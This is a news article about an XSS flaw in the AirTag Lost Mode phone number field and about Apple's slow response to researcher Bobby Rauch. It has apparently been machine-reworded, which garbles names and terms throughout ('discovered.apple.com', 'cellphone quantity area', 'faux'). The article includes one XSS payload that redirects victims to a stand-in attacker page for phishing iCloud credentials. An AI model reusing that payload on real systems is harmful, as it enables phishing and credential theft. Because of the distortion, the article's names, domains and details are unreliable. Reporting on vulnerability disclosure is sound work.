The hits maintain coming to Apple’s bug-bounty program, which safety researchers say is sluggish and inconsistent to answer its vulnerability reviews.
This time, the vuln du jour is because of failure to sanitize a user-input area—particularly, the cellphone quantity area AirTag homeowners use to determine their misplaced units.
The Good Samaritan assault
Safety marketing consultant and penetration tester Bobby Rauch found that Apple’s AirTags—tiny units which may be affixed to regularly misplaced objects like laptops, telephones, or automotive keys—do not sanitize consumer enter. This oversight opens the door for AirTags for use in a drop attack. As a substitute of seeding a goal’s parking zone with USB drives loaded with malware, an attacker can drop a maliciously ready AirTag.
This type of assault does not want a lot technological know-how—the attacker merely sorts legitimate XSS into the AirTag’s cellphone quantity area, then places the AirTag in Misplaced mode and drops it someplace the goal is more likely to discover it. In concept, scanning a misplaced AirTag is a secure motion—it is solely speculated to pop up a webpage at https://discovered.apple.com/. The issue is that
discovered.apple.com then embeds the contents of the cellphone quantity area within the web site as displayed on the sufferer’s browser, unsanitized.
The obvious strategy to exploit this vulnerability, Rauch reviews, is to make use of easy XSS to pop up a faux iCloud login dialog on the sufferer’s cellphone. This does not take a lot in any respect in the way in which of code:
<script>window.location='https://path/to/badsite.tld/web page.html';var a="";</script>
discovered.apple.com innocently embeds the XSS above into the response for a scanned AirTag, the sufferer will get a popup window which shows the contents of
badside.tld/web page.html. This could be a zero-day exploit for the browser or just a phishing dialog. Rauch hypothesizes a faux iCloud login dialog, which may be made to look identical to the true factor—however which dumps the sufferer’s Apple credentials onto the goal’s server as an alternative.
Though this can be a compelling exploit, it is on no account the one one obtainable—absolutely anything you are able to do with a webpage is on the desk and obtainable. That ranges from easy phishing as seen within the above instance to exposing the sufferer’s cellphone to a zero-day no-click browser vulnerability.
Extra technical element—and easy movies displaying each the vulnerability, and the community exercise spawned by Rauch’s exploit of the vulnerability—can be found at Rauch’s public disclosure on Medium.
This public disclosure delivered to you by Apple
Rauch instructed Krebs that he initially disclosed the vulnerability privately to Apple on June 20, however for 3 months all the corporate would inform him is that it was “nonetheless investigating.” That is an odd response for what seems to be an very simple bug to confirm and mitigate. Final Thursday, Apple emailed Rauch to say the weak point could be addressed in a coming replace, and it requested that he not discuss it publicly within the meantime.
Apple by no means responded to fundamental questions Rauch requested, reminiscent of whether or not it had a timeline for fixing the bug, whether or not it deliberate to credit score him for the report, and whether or not it could qualify for a bounty. The shortage of communication from Cupertino prompted Rauch to go public on Medium, even supposing Apple requires researchers to maintain quiet about their discoveries if they need credit score and/or compensation for his or her work.
Rauch expressed willingness to work with Apple however requested the corporate to “present some particulars of once you plan on remediating this, and whether or not there could be any recognition or bug bounty payout.” He additionally warned the corporate that he deliberate to publish in 90 days. Rauch says that Apple’s response was “principally, we would admire it should you did not leak this.”
Now we have reached out to Apple for remark and can replace right here with any reply.